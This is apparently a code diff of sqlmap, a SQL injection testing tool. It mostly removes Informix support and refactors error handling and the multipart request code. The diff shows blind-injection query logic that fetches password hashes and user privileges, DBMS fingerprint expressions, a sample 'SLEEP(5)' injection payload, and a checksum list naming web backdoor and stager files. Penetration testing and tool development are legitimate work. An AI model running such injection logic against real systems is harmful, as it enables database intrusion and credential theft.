elif inject.checkBooleanExpression("REVERSE('sqlmap')='pamlqs'"):
Backend.setVersionList([">= 9.1.0", "< 9.2.0"])
if inject.checkBooleanExpression("REVERSE('sqlmap')='pamlqs'"):
Backend.setVersion(">= 9.1.0")
elif inject.checkBooleanExpression("LENGTH(TO_CHAR(1,'EEEE'))>0"):
Backend.setVersionList([">= 9.0.0", "< 9.1.0"])
elif inject.checkBooleanExpression("2=(SELECT DIV(6,3))"):

View File

@@ -32,7 +32,6 @@ from lib.core.data import logger
from lib.core.data import paths
from lib.core.data import queries
from lib.core.dicts import FIREBIRD_TYPES
from lib.core.dicts import INFORMIX_TYPES
from lib.core.enums import CHARSET_TYPE
from lib.core.enums import DBMS
from lib.core.enums import EXPECTED
@@ -336,7 +335,7 @@ class Databases:
query = rootQuery.blind.query % (kb.data.cachedTables[-1] if kb.data.cachedTables else " ")
elif Backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.FIREBIRD):
query = rootQuery.blind.query % index
elif Backend.getIdentifiedDbms() in (DBMS.HSQLDB, DBMS.INFORMIX):
elif Backend.isDbms(DBMS.HSQLDB):
query = rootQuery.blind.query % (index, unsafeSQLIdentificatorNaming(db))
else:
query = rootQuery.blind.query % (unsafeSQLIdentificatorNaming(db), index)
@@ -604,17 +603,8 @@ class Databases:
if len(columnData) == 1:
columns[name] = None
else:
key = int(columnData[1]) if isinstance(columnData[1], basestring) and columnData[1].isdigit() else columnData[1]
if Backend.isDbms(DBMS.FIREBIRD):
columnData[1] = FIREBIRD_TYPES.get(key, columnData[1])
elif Backend.isDbms(DBMS.INFORMIX):
notNull = False
if isinstance(key, int) and key > 255:
key -= 256
notNull = True
columnData[1] = INFORMIX_TYPES.get(key, columnData[1])
if notNull:
columnData[1] = "%s NOT NULL" % columnData[1]
columnData[1] = FIREBIRD_TYPES.get(int(columnData[1]) if isinstance(columnData[1], basestring) and columnData[1].isdigit() else columnData[1], columnData[1])
columns[name] = columnData[1]
@@ -666,10 +656,6 @@ class Databases:
query = rootQuery.blind.count % (tbl)
query += condQuery
elif Backend.isDbms(DBMS.INFORMIX):
query = rootQuery.blind.count % (conf.db, conf.db, conf.db, conf.db, conf.db, tbl)
query += condQuery
elif Backend.isDbms(DBMS.SQLITE):
query = rootQuery.blind.query % tbl
value = unArrayizeValue(inject.getValue(query, union=False, error=False))
@@ -726,10 +712,6 @@ class Databases:
query = rootQuery.blind.query % (tbl)
query += condQuery
field = None
elif Backend.isDbms(DBMS.INFORMIX):
query = rootQuery.blind.query % (index, conf.db, conf.db, conf.db, conf.db, conf.db, tbl)
query += condQuery
field = condition
query = agent.limitQuery(index, query, field, field)
column = unArrayizeValue(inject.getValue(query, union=False, error=False))
@@ -762,22 +744,11 @@ class Databases:
conf.db, conf.db, unsafeSQLIdentificatorNaming(tbl).split(".")[-1])
elif Backend.isDbms(DBMS.FIREBIRD):
query = rootQuery.blind.query2 % (tbl, column)
elif Backend.isDbms(DBMS.INFORMIX):
query = rootQuery.blind.query2 % (conf.db, conf.db, conf.db, conf.db, conf.db, tbl, column)
colType = unArrayizeValue(inject.getValue(query, union=False, error=False))
key = int(colType) if isinstance(colType, basestring) and colType.isdigit() else colType
if Backend.isDbms(DBMS.FIREBIRD):
colType = FIREBIRD_TYPES.get(key, colType)
elif Backend.isDbms(DBMS.INFORMIX):
notNull = False
if isinstance(key, int) and key > 255:
key -= 256
notNull = True
colType = INFORMIX_TYPES.get(key, colType)
if notNull:
colType = "%s NOT NULL" % colType
colType = FIREBIRD_TYPES.get(colType, colType)
column = safeSQLIdentificatorNaming(column)
columns[column] = colType

View File

@@ -110,10 +110,7 @@ class Entries:
kb.data.cachedColumns = foundData
try:
if Backend.isDbms(DBMS.INFORMIX):
kb.dumpTable = "%s:%s" % (conf.db, tbl)
else:
kb.dumpTable = "%s.%s" % (conf.db, tbl)
kb.dumpTable = "%s.%s" % (conf.db, tbl)
if not safeSQLIdentificatorNaming(conf.db) in kb.data.cachedColumns \
or safeSQLIdentificatorNaming(tbl, True) not in \
@@ -239,8 +236,6 @@ class Entries:
query = rootQuery.blind.count % ("%s.%s" % (conf.db, tbl))
elif Backend.isDbms(DBMS.MAXDB):
query = rootQuery.blind.count % tbl
elif Backend.isDbms(DBMS.INFORMIX):
query = rootQuery.blind.count % (conf.db, tbl)
else:
query = rootQuery.blind.count % (conf.db, tbl)
@@ -321,13 +316,14 @@ class Entries:
if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB):
query = rootQuery.blind.query % (agent.preprocessField(tbl, column), conf.db, conf.tbl, sorted(colList, key=len)[0], index)
elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2):
query = rootQuery.blind.query % (agent.preprocessField(tbl, column), tbl.upper() if not conf.db else ("%s.%s" % (conf.db.upper(), tbl.upper())), index)
query = rootQuery.blind.query % (agent.preprocessField(tbl, column),
tbl.upper() if not conf.db else ("%s.%s" % (conf.db.upper(), tbl.upper())),
index)
elif Backend.isDbms(DBMS.SQLITE):
query = rootQuery.blind.query % (agent.preprocessField(tbl, column), tbl, index)
elif Backend.isDbms(DBMS.FIREBIRD):
query = rootQuery.blind.query % (index, agent.preprocessField(tbl, column), tbl)
elif Backend.isDbms(DBMS.INFORMIX):
query = rootQuery.blind.query % (index, agent.preprocessField(tbl, column), conf.db, tbl, sorted(colList, key=len)[0])
query = whereQuery(query)

View File

@@ -27,11 +27,10 @@ from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
from lib.core.data import queries
from lib.core.dicts import DB2_PRIVS
from lib.core.dicts import FIREBIRD_PRIVS
from lib.core.dicts import INFORMIX_PRIVS
from lib.core.dicts import MYSQL_PRIVS
from lib.core.dicts import PGSQL_PRIVS
from lib.core.dicts import FIREBIRD_PRIVS
from lib.core.dicts import DB2_PRIVS
from lib.core.enums import CHARSET_TYPE
from lib.core.enums import DBMS
from lib.core.enums import EXPECTED
@@ -252,25 +251,22 @@ class Users:
if user in retrievedUsers:
continue
if Backend.isDbms(DBMS.INFORMIX):
count = 1
infoMsg = "fetching number of password hashes "
infoMsg += "for user '%s'" % user
logger.info(infoMsg)
if Backend.isDbms(DBMS.MSSQL) and Backend.isVersionWithin(("2005", "2008")):
query = rootQuery.blind.count2 % user
else:
infoMsg = "fetching number of password hashes "
infoMsg += "for user '%s'" % user
logger.info(infoMsg)
query = rootQuery.blind.count % user
if Backend.isDbms(DBMS.MSSQL) and Backend.isVersionWithin(("2005", "2008")):
query = rootQuery.blind.count2 % user
else:
query = rootQuery.blind.count % user
count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
if not isNumPosStrValue(count):
warnMsg = "unable to retrieve the number of password "
warnMsg += "hashes for user '%s'" % user
logger.warn(warnMsg)
continue
if not isNumPosStrValue(count):
warnMsg = "unable to retrieve the number of password "
warnMsg += "hashes for user '%s'" % user
logger.warn(warnMsg)
continue
infoMsg = "fetching password hashes for user '%s'" % user
logger.info(infoMsg)
@@ -286,14 +282,11 @@ class Users:
query = rootQuery.blind.query2 % (user, index, user)
else:
query = rootQuery.blind.query % (user, index, user)
elif Backend.isDbms(DBMS.INFORMIX):
query = rootQuery.blind.query % (user,)
else:
query = rootQuery.blind.query % (user, index)
password = unArrayizeValue(inject.getValue(query, union=False, error=False))
password = parsePasswordHash(password)
passwords.append(password)
if passwords:
@@ -477,35 +470,32 @@ class Users:
if Backend.isDbms(DBMS.MYSQL) and kb.data.has_information_schema:
user = "%%%s%%" % user
if Backend.isDbms(DBMS.INFORMIX):
count = 1
infoMsg = "fetching number of privileges "
infoMsg += "for user '%s'" % outuser
logger.info(infoMsg)
if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema:
query = rootQuery.blind.count2 % user
elif Backend.isDbms(DBMS.MYSQL) and kb.data.has_information_schema:
query = rootQuery.blind.count % (conditionChar, user)
elif Backend.isDbms(DBMS.ORACLE) and query2:
query = rootQuery.blind.count2 % user
else:
infoMsg = "fetching number of privileges "
infoMsg += "for user '%s'" % outuser
logger.info(infoMsg)
query = rootQuery.blind.count % user
if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema:
query = rootQuery.blind.count2 % user
elif Backend.isDbms(DBMS.MYSQL) and kb.data.has_information_schema:
query = rootQuery.blind.count % (conditionChar, user)
elif Backend.isDbms(DBMS.ORACLE) and query2:
query = rootQuery.blind.count2 % user
else:
query = rootQuery.blind.count % user
count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
if not isNumPosStrValue(count):
if not retrievedUsers and Backend.isDbms(DBMS.ORACLE) and not query2:
infoMsg = "trying with table USER_SYS_PRIVS"
logger.info(infoMsg)
if not isNumPosStrValue(count):
if not retrievedUsers and Backend.isDbms(DBMS.ORACLE) and not query2:
infoMsg = "trying with table USER_SYS_PRIVS"
logger.info(infoMsg)
return self.getPrivileges(query2=True)
return self.getPrivileges(query2=True)
warnMsg = "unable to retrieve the number of "
warnMsg += "privileges for user '%s'" % outuser
logger.warn(warnMsg)
continue
warnMsg = "unable to retrieve the number of "
warnMsg += "privileges for user '%s'" % outuser
logger.warn(warnMsg)
continue
infoMsg = "fetching privileges for user '%s'" % outuser
logger.info(infoMsg)
@@ -524,8 +514,6 @@ class Users:
query = rootQuery.blind.query2 % (user, index)
elif Backend.isDbms(DBMS.FIREBIRD):
query = rootQuery.blind.query % (index, user)
elif Backend.isDbms(DBMS.INFORMIX):
query = rootQuery.blind.query % (user,)
else:
query = rootQuery.blind.query % (user, index)
@@ -573,10 +561,6 @@ class Users:
elif Backend.isDbms(DBMS.FIREBIRD):
privileges.add(FIREBIRD_PRIVS[privilege.strip()])
# In Informix we get one letter for the highest privilege
elif Backend.isDbms(DBMS.INFORMIX):
privileges.add(INFORMIX_PRIVS[privilege.strip()])
# In DB2 we get Y or G if the privilege is
# True, N otherwise
elif Backend.isDbms(DBMS.DB2):

View File

@@ -63,6 +63,8 @@ try:
from lib.core.testing import smokeTest
from lib.core.testing import liveTest
from lib.parse.cmdline import cmdLineParser
from lib.utils.api import setRestAPILog
from lib.utils.api import StdDbOut
except KeyboardInterrupt:
errMsg = "user aborted"
logger.error(errMsg)
@@ -99,15 +101,6 @@ def checkEnvironment():
logger.critical(errMsg)
raise SystemExit
# Patch for pip (import) environment
if "sqlmap.sqlmap" in sys.modules:
for _ in ("cmdLineOptions", "conf", "kb"):
globals()[_] = getattr(sys.modules["lib.core.data"], _)
for _ in ("SqlmapBaseException", "SqlmapShellQuitException", "SqlmapSilentQuitException", "SqlmapUserQuitException"):
globals()[_] = getattr(sys.modules["lib.core.exception"], _)
def main():
"""
Main function of sqlmap when running from command line.
@@ -124,10 +117,6 @@ def main():
initOptions(cmdLineOptions)
if hasattr(conf, "api"):
# heavy imports
from lib.utils.api import StdDbOut
from lib.utils.api import setRestAPILog
# Overwrite system standard output and standard error to write
# to an IPC database
sys.stdout = StdDbOut(conf.taskid, messagetype="stdout")
@@ -206,19 +195,13 @@ def main():
try:
if not checkIntegrity():
errMsg = "code integrity check failed (turning off automatic issue creation). "
errMsg = "code integrity check failed. "
errMsg += "You should retrieve the latest development version from official GitHub "
errMsg += "repository at '%s'" % GIT_PAGE
logger.critical(errMsg)
print
dataToStdout(excMsg)
raise SystemExit
elif "MemoryError" in excMsg:
errMsg = "memory exhaustion detected"
logger.error(errMsg)
raise SystemExit
elif any(_ in excMsg for _ in ("No space left", "Disk quota exceeded")):
errMsg = "no space left on output device"
logger.error(errMsg)
@@ -236,11 +219,6 @@ def main():
logger.error(errMsg)
raise SystemExit
elif "OperationalError: disk I/O error" in excMsg:
errMsg = "I/O error on output device"
logger.error(errMsg)
raise SystemExit
elif "_mkstemp_inner" in excMsg:
errMsg = "there has been a problem while accessing temporary files"
logger.error(errMsg)
@@ -322,7 +300,7 @@ def main():
if hasattr(conf, "api"):
try:
conf.databaseCursor.disconnect()
conf.database_cursor.disconnect()
except KeyboardInterrupt:
pass
@@ -336,10 +314,10 @@ def main():
time.sleep(0.01)
except KeyboardInterrupt:
pass
finally:
# Reference: http://stackoverflow.com/questions/1635080/terminate-a-multi-thread-python-program
if threading.activeCount() > 1:
os._exit(0)
# Reference: http://stackoverflow.com/questions/1635080/terminate-a-multi-thread-python-program
if threading.activeCount() > 1:
os._exit(0)
if __name__ == "__main__":
main()

View File

@@ -1,25 +0,0 @@
#!/usr/bin/env python
"""
Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
import re
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.LOW
def dependencies():
pass
def tamper(payload, **kwargs):
"""
HTML encode (using code points) all non-alphanumeric characters
>>> tamper("1' AND SLEEP(5)#")
'1&#39;&#32;AND&#32;SLEEP&#40;5&#41;&#35;'
"""
return re.sub(r"[^\w]", lambda match: "&#%d;" % ord(match.group(0)), payload) if payload else payload

View File

@@ -1142,7 +1142,7 @@ def _ParseFileEx(file, base_uri,
try:
form.fixup()
except AttributeError, ex:
if not any(_ in str(ex) for _ in ("is disabled", "is readonly")):
if not any(_ in str(ex) for _ in ("item is disabled", "is readonly")):
raise
return forms

View File

@@ -47,13 +47,13 @@ class MultipartPostHandler(urllib2.BaseHandler):
def http_request(self, request):
data = request.get_data()
if isinstance(data, dict):
if data is not None and type(data) != str:
v_files = []
v_vars = []
try:
for(key, value) in data.items():
if isinstance(value, file) or hasattr(value, "file") or isinstance(value, StringIO.StringIO):
if isinstance(value, file) or hasattr(value, 'file') or isinstance(value, StringIO.StringIO):
v_files.append((key, value))
else:
v_vars.append((key, value))
@@ -65,10 +65,10 @@ class MultipartPostHandler(urllib2.BaseHandler):
data = urllib.urlencode(v_vars, doseq)
else:
boundary, data = self.multipart_encode(v_vars, v_files)
contenttype = "multipart/form-data; boundary=%s" % boundary
#if (request.has_header("Content-Type") and request.get_header("Content-Type").find("multipart/form-data") != 0):
# print "Replacing %s with %s" % (request.get_header("content-type"), "multipart/form-data")
request.add_unredirected_header("Content-Type", contenttype)
contenttype = 'multipart/form-data; boundary=%s' % boundary
#if (request.has_header('Content-Type') and request.get_header('Content-Type').find('multipart/form-data') != 0):
# print "Replacing %s with %s" % (request.get_header('content-type'), 'multipart/form-data')
request.add_unredirected_header('Content-Type', contenttype)
request.add_data(data)
return request
@@ -78,32 +78,32 @@ class MultipartPostHandler(urllib2.BaseHandler):
boundary = mimetools.choose_boundary()
if buf is None:
buf = ""
buf = ''
for (key, value) in vars:
if key is not None and value is not None:
buf += "--%s\r\n" % boundary
buf += "Content-Disposition: form-data; name=\"%s\"" % key
buf += "\r\n\r\n" + value + "\r\n"
buf += '--%s\r\n' % boundary
buf += 'Content-Disposition: form-data; name="%s"' % key
buf += '\r\n\r\n' + value + '\r\n'
for (key, fd) in files:
file_size = os.fstat(fd.fileno())[stat.ST_SIZE] if isinstance(fd, file) else fd.len
filename = fd.name.split("/")[-1] if "/" in fd.name else fd.name.split("\\")[-1]
filename = fd.name.split('/')[-1] if '/' in fd.name else fd.name.split('\\')[-1]
try:
contenttype = mimetypes.guess_type(filename)[0] or "application/octet-stream"
contenttype = mimetypes.guess_type(filename)[0] or 'application/octet-stream'
except:
# Reference: http://bugs.python.org/issue9291
contenttype = "application/octet-stream"
buf += "--%s\r\n" % boundary
buf += "Content-Disposition: form-data; name=\"%s\"; filename=\"%s\"\r\n" % (key, filename)
buf += "Content-Type: %s\r\n" % contenttype
# buf += "Content-Length: %s\r\n" % file_size
contenttype = 'application/octet-stream'
buf += '--%s\r\n' % boundary
buf += 'Content-Disposition: form-data; name="%s"; filename="%s"\r\n' % (key, filename)
buf += 'Content-Type: %s\r\n' % contenttype
# buf += 'Content-Length: %s\r\n' % file_size
fd.seek(0)
buf = str(buf) if not isinstance(buf, unicode) else buf.encode("utf8")
buf += "\r\n%s\r\n" % fd.read()
buf += '\r\n%s\r\n' % fd.read()
buf += "--%s--\r\n\r\n" % boundary
buf += '--%s--\r\n\r\n' % boundary
return boundary, buf

View File

@@ -10,7 +10,7 @@ acba8b5dc93db0fe6b2b04ff0138c33c extra/icmpsh/icmpsh.exe_
cc9c82cfffd8ee9b25ba3af6284f057e extra/__init__.py
2237d0568236c354b0436d2cd9434f97 extra/mssqlsig/update.py
cc9c82cfffd8ee9b25ba3af6284f057e extra/safe2bin/__init__.py
a54bde99fd05fdb412cba5a8780f3e18 extra/safe2bin/safe2bin.py
cc5b67714d8a0b6b81d29a4f15634c16 extra/safe2bin/safe2bin.py
d229479d02d21b29f209143cb0547780 extra/shellcodeexec/linux/shellcodeexec.x32_
2fe2f94eebc62f7614f0391a8a90104f extra/shellcodeexec/linux/shellcodeexec.x64_
c55b400b72acc43e0e59c87dd8bb8d75 extra/shellcodeexec/windows/shellcodeexec.x32.exe_
@@ -19,58 +19,59 @@ b46521e29ea3d813bab5aeb16cac6498 extra/shutils/duplicates.py
05615626222060120450518136b14ba9 extra/shutils/regressiontest.py
cc9c82cfffd8ee9b25ba3af6284f057e extra/sqlharvest/__init__.py
4f2f817596540d82f9fcc0c5b2228beb extra/sqlharvest/sqlharvest.py
2daa39e4d59526acb4772b6c47eb315f lib/controller/action.py
66cddf7f40c002d663d4401a440ec1aa lib/controller/checks.py
242eb9edf447e09fa3f5d154495308e6 lib/controller/controller.py
0a64305c3b3a01a2fc3a5e6204f442f1 lib/controller/handler.py
b704c0f943c015f6247cfae20048ae8e lib/controller/action.py
d1451b43f3ac80bfbea8657e288865f8 lib/controller/checks.py
7c5ba631796f12d6de9b667e4cc7812b lib/controller/controller.py
5ae8f657fd4e8026fcc9624f5b5533fe lib/controller/handler.py
cc9c82cfffd8ee9b25ba3af6284f057e lib/controller/__init__.py
04f16204c899438dc7599a9a8426bfee lib/core/agent.py
2689f320908964b2c88a3eb8265fd2dd lib/core/agent.py
eb0bd28b0bd9fbf67dcc3119116df377 lib/core/bigarray.py
b1e2ccdeea8bf12feb839d403dc05796 lib/core/common.py
1dd298ac06c961037bb76a675bb4b322 lib/core/common.py
5680d0c446a3bed5c0f2a0402d031557 lib/core/convert.py
e77cca1cb063016f71f6e6bdebf4ec73 lib/core/data.py
1d042f0bc0557d3fd564ea5a46deb77e lib/core/datatype.py
e4ca0fd47f20cf7ba6a5f5cbf980073c lib/core/decorators.py
67f206cf2658145992cc1d7020138325 lib/core/defaults.py
439cae0904cf3db20d1bc81d56980a21 lib/core/dicts.py
4a16002c5d9cd047c2e89ddc5db63737 lib/core/dicts.py
1f98d3f57ce21d625fd67adb26cfd13c lib/core/dump.py
1128705f593013359497b3959078b650 lib/core/enums.py
34a45b9bc68a6381247a620ddf30de1c lib/core/enums.py
e4aec2b11c1ad6039d0c3dbbfbc5eb1a lib/core/exception.py
cc9c82cfffd8ee9b25ba3af6284f057e lib/core/__init__.py
91c514013daa796e2cdd940389354eac lib/core/log.py
5b079749c50240602ea92637e268ed31 lib/core/optiondict.py
16d9e1100189966d8a2224d23fcd2ca2 lib/core/option.py
b9779615206791e6ebbaa84947842b49 lib/core/optiondict.py
85b144015724e1961e6c9ea1a42b329a lib/core/option.py
1e8948dddbd12def5c2af52530738059 lib/core/profiling.py
e60456db5380840a586654344003d4e6 lib/core/readlineng.py
5ef56abb8671c2ca6ceecb208258e360 lib/core/replication.py
99a2b496b9d5b546b335653ca801153f lib/core/revision.py
7c15dd2777af4dac2c89cab6df17462e lib/core/session.py
1d029b393fe525c9ad1ecac20b064ca5 lib/core/settings.py
1a0fab09e6840a52bdfec892fbd9ee53 lib/core/settings.py
7af83e4f18cab6dff5e67840eb65be80 lib/core/shell.py
23657cd7d924e3c6d225719865855827 lib/core/subprocessng.py
c3ace7874a536d801f308cf1fd03df99 lib/core/target.py
d43f059747ffd48952922c94152e2a07 lib/core/testing.py
2cafee22d9f8018e7efff0a5e3178596 lib/core/threads.py
0bc2fae1dec18cdd11954b22358293f2 lib/core/target.py
21b9aa385c851a4e8faaff9b985e29b8 lib/core/testing.py
424a6cf9bdfaf7182657ed7929d7df5a lib/core/threads.py
53c15b78e0288274f52410db25406432 lib/core/unescaper.py
6bdc53e2ca152ff8cd35ad671e48a96b lib/core/update.py
8485a3cd94c0a5af2718bad60c5f1ae5 lib/core/wordlist.py
354ecc0c6d3e0ac9c06ed897c4d52edf lib/core/xmldump.py
cc9c82cfffd8ee9b25ba3af6284f057e lib/__init__.py
c1288bc4ce5651dbdd82d4a9435fdc03 lib/parse/banner.py
bc8a27a451d988398d7e25a786b2c8a2 lib/parse/cmdline.py
bf7fbfb04d6150d19ecfd9b25ee5618a lib/parse/cmdline.py
8ec4d4f02634834701f8258726f2e511 lib/parse/configfile.py
fe4e2152292587928edb94c9a4d311ff lib/parse/handler.py
8e6bfb13e5a34b2610f3ff23467a34cf lib/parse/headers.py
cfa7b4c52915e1d7d59409ed49f0e623 lib/parse/html.py
c8e14fbfc6616d8149b2603c97abec84 lib/parse/html.py
cc9c82cfffd8ee9b25ba3af6284f057e lib/parse/__init__.py
af6b8e1c6eb074b56bbd9cd80aebcd97 lib/parse/payloads.py
b40a4c5d91770d347df36d3065b63798 lib/parse/sitemap.py
9299f21804033f099681525bb9bf51c0 lib/request/basicauthhandler.py
083e7f446909b12009e72ae8e5e5737c lib/request/basic.py
c48285682a61d49982cb508351013cb4 lib/request/comparison.py
3b35467cd761ed53dfb35a85d8d6590d lib/request/connect.py
a3e83cfe7e6825fb1b70951ad290d2ae lib/request/basic.py
9d757c63413a15222af90d3648de9de3 lib/request/comparison.py
72a0e7bb1010bb39c6538dbc77eae180 lib/request/connect.py
49b4c583af68689de5f9acb162de2939 lib/request/direct.py
1a46f7bb26b23ec0c0d9d9c95828241b lib/request/dns.py
70ceefe39980611494d4f99afb96f652 lib/request/httpshandler.py
567656470d23a42ab57ec55a03989dbb lib/request/httpshandler.py
cc9c82cfffd8ee9b25ba3af6284f057e lib/request/__init__.py
aa155f8b27d56485d3ff15efa5e1b07a lib/request/inject.py
3fc323d525beddd14cd4d4dca4934fa8 lib/request/methodrequest.py
@@ -81,12 +82,12 @@ b2ffd261947994f4a4af555d468b4970 lib/request/rangehandler.py
937b7e276f25ccac5a2ac0bf9b1ef434 lib/takeover/abstraction.py
3ecf028d8d93025d2a12c6f6fc13adb2 lib/takeover/icmpsh.py
cc9c82cfffd8ee9b25ba3af6284f057e lib/takeover/__init__.py
2d39688ec1b871005b520b6f1ed97ba6 lib/takeover/metasploit.py
1d064463302b85b2241263ea48a83837 lib/takeover/metasploit.py
7083825564c051a7265cfdd1a5e6629c lib/takeover/registry.py
7d6cd7bdfc8f4bc4e8aed60c84cdf87f lib/takeover/udf.py
d9bdcc17091374c53ad2eea7fd72a909 lib/takeover/web.py
f6e3084abd506925a8be3d1c0a6d058c lib/takeover/web.py
9af83a62de360184f1c14e69b8a95cfe lib/takeover/xp_cmdshell.py
27d41f38de7348600309e1cb6741fb2e lib/techniques/blind/inference.py
927092550c89f8c3c5caad2b14af0830 lib/techniques/blind/inference.py
cc9c82cfffd8ee9b25ba3af6284f057e lib/techniques/blind/__init__.py
cc9c82cfffd8ee9b25ba3af6284f057e lib/techniques/brute/__init__.py
d36effffe64e63ef9b3be490f850e2cc lib/techniques/brute/use.py
@@ -99,9 +100,9 @@ cc9c82cfffd8ee9b25ba3af6284f057e lib/techniques/__init__.py
cc9c82cfffd8ee9b25ba3af6284f057e lib/techniques/union/__init__.py
f5d6884cdeed28281187c111d3e49e3b lib/techniques/union/test.py
12ce1bb7ee5f1f23f58be12fe9fa8472 lib/techniques/union/use.py
26c1babc6289fac9056f8b21d10f3bb1 lib/utils/api.py
2dfc03a7322c46deb2e5353a7fd4be5e lib/utils/api.py
8cdc8c1e663c3b92a756fb7b02cc3c02 lib/utils/crawler.py
e30011943692aa2fe7c1185974112bc0 lib/utils/deps.py
393f8fd1684308213e1d2e6a9d4258c2 lib/utils/deps.py
4dfd3a95e73e806f62372d63bc82511f lib/utils/getch.py
b1e83fc549334fae8f60552dcdad28cb lib/utils/hashdb.py
0330607242d4f704ae6d7bba5f52ccae lib/utils/hash.py
@@ -114,7 +115,7 @@ cc9b0f68dd58a2576a5a454b7f5f6b9c lib/utils/search.py
4a0374ac0bc9d726446f04c77fbb5697 lib/utils/sqlalchemy.py
8013e4a4c62ad916452434ea3c352a7a lib/utils/timeout.py
e6fa0e76367a77015da113811dfd9712 lib/utils/versioncheck.py
adafdb28095ba2d03322fee2aae4548f lib/utils/xrange.py
4759e0bb8931d461dfcad410ca05fc5d lib/utils/xrange.py
988100b4a1cd3b07acfd8b6ec692aed5 plugins/dbms/access/connector.py
27a5ae5611836b073dd53b21435f0979 plugins/dbms/access/enumeration.py
438090ab8ca63d9c23831a5ffbef74d9 plugins/dbms/access/filesystem.py
@@ -143,13 +144,6 @@ c9d59b7c60aa0f0b23f920f932547e40 plugins/dbms/hsqldb/fingerprint.py
d278ad5f1c13fea871ed1120942244d5 plugins/dbms/hsqldb/__init__.py
d781720e15c23b662bae3098ed470756 plugins/dbms/hsqldb/syntax.py
2f957281cfe80396f73a3dccc0cb6d45 plugins/dbms/hsqldb/takeover.py
78917f19ea0750a665094d7dd7778d0c plugins/dbms/informix/connector.py
d251aecff7544f79f78385386bb7fa35 plugins/dbms/informix/enumeration.py
e8f0f28da98020dce27970a50e10a23b plugins/dbms/informix/filesystem.py
89540595a6011b47629c68d11a5e4533 plugins/dbms/informix/fingerprint.py
99a77ad7aa7ca4a4b5981f2fa0d9c616 plugins/dbms/informix/__init__.py
8300ca02ecf00d3b00d78ecde8a86c09 plugins/dbms/informix/syntax.py
5f130772d2295ae61140acba894eaceb plugins/dbms/informix/takeover.py
cc9c82cfffd8ee9b25ba3af6284f057e plugins/dbms/__init__.py
4c8667e8af763ddf82ee314c6681d4e1 plugins/dbms/maxdb/connector.py
075fd66b8bbabed18aeb304c6c0ef2a2 plugins/dbms/maxdb/enumeration.py
@@ -168,7 +162,7 @@ f3da9f5298dac5d1f468828c07c81f70 plugins/dbms/mssqlserver/takeover.py
d8cd212ba7be09483af3f32256b71f05 plugins/dbms/mysql/connector.py
d251aecff7544f79f78385386bb7fa35 plugins/dbms/mysql/enumeration.py
a970f90c91ebd3a7e22955424fe5414e plugins/dbms/mysql/filesystem.py
edc62bbf269d053ccc68b4cdfebdf12b plugins/dbms/mysql/fingerprint.py
eed5093257e65adfae7bb56c5a6d3eb0 plugins/dbms/mysql/fingerprint.py
a4535cb3873ada344e6e61dbe1a546d3 plugins/dbms/mysql/__init__.py
4ad721acc40a964fc67154dd4683870e plugins/dbms/mysql/syntax.py
aa88b5d6198cd31d9ab2be664da9a265 plugins/dbms/mysql/takeover.py
@@ -182,7 +176,7 @@ cac6bd84d44ac929da6800719279875b plugins/dbms/oracle/takeover.py
6c54ca5c9efad3e437467f9fe44435d6 plugins/dbms/postgresql/connector.py
419dd50e6688fef760fec4f71430fb29 plugins/dbms/postgresql/enumeration.py
9756fc02fc84719c3e330fcc7914bf17 plugins/dbms/postgresql/filesystem.py
5bd67a898b9671c78b00b9299674e6d7 plugins/dbms/postgresql/fingerprint.py
28bce42dac3ee8efccc78c7a58b170b6 plugins/dbms/postgresql/fingerprint.py
0e7d17abf68f1dd770e969c84878d246 plugins/dbms/postgresql/__init__.py
8711e7c1265a5e651c9aadca7db40cd5 plugins/dbms/postgresql/syntax.py
50d8070e687e5806058a121311a36385 plugins/dbms/postgresql/takeover.py
@@ -202,8 +196,8 @@ d0c7cc8ec2aa716b2e5cd3b5ab805c3a plugins/dbms/sybase/__init__.py
7a1c6cb238b5b464e1e9641469e6e503 plugins/dbms/sybase/takeover.py
62faa58e5aace4b6a6d562788685186f plugins/generic/connector.py
cdbf6eec4a94f830deb7dbab1c1a2935 plugins/generic/custom.py
f27f76bfd2ed9ce384dcd43fb7e10226 plugins/generic/databases.py
1177bbad4e77a2ca85e0054569e03d38 plugins/generic/entries.py
977bbd1bced67c2c4aa74d12c77ac165 plugins/generic/databases.py
f2394baa3746188184be2144025eeffc plugins/generic/entries.py
e335b868f5fb1154c9f72143d602915d plugins/generic/enumeration.py
3e673ef4e6592f52a11d88e61fe4dc2b plugins/generic/filesystem.py
5637c508ca6348f29c2b100a3e80dddc plugins/generic/fingerprint.py
@@ -212,7 +206,7 @@ cc9c82cfffd8ee9b25ba3af6284f057e plugins/generic/__init__.py
7b3e044a7fca497278d79883697089b7 plugins/generic/search.py
73f8d047dbbcff307d62357836e382e6 plugins/generic/syntax.py
da3ebc20998af02e3d952d0417a67792 plugins/generic/takeover.py
d35f994664fb7a7fcee656633dfb31ed plugins/generic/users.py
4b5a6e2aec8e240fc43916d9dde27b14 plugins/generic/users.py
cc9c82cfffd8ee9b25ba3af6284f057e plugins/__init__.py
b04db3e861edde1f9dd0a3850d5b96c8 shell/backdoor.asp_
158bfa168128393dde8d6ed11fe9a1b8 shell/backdoor.aspx_
@@ -224,7 +218,7 @@ c3cc8b7727161e64ab59f312c33b541a shell/stager.aspx_
1f7f125f30e0e800beb21e2ebbab18e1 shell/stager.jsp_
01e3505e796edf19aad6a996101c81c9 shell/stager.php_
56702e95555adee718b6a11ee7098fd4 sqlmapapi.py
4b8d19a39402dc7f8a341608a9625aa1 sqlmap.py
7e80fcefc56426ed780c48556b70a1f0 sqlmap.py
1316deb997418507e76221c84ec99946 tamper/apostrophemask.py
a6efe8f914c769c52afec703bd73609f tamper/apostrophenullencode.py
b1c56983919b69f4f6f0e7929c881e7a tamper/appendnullbyte.py
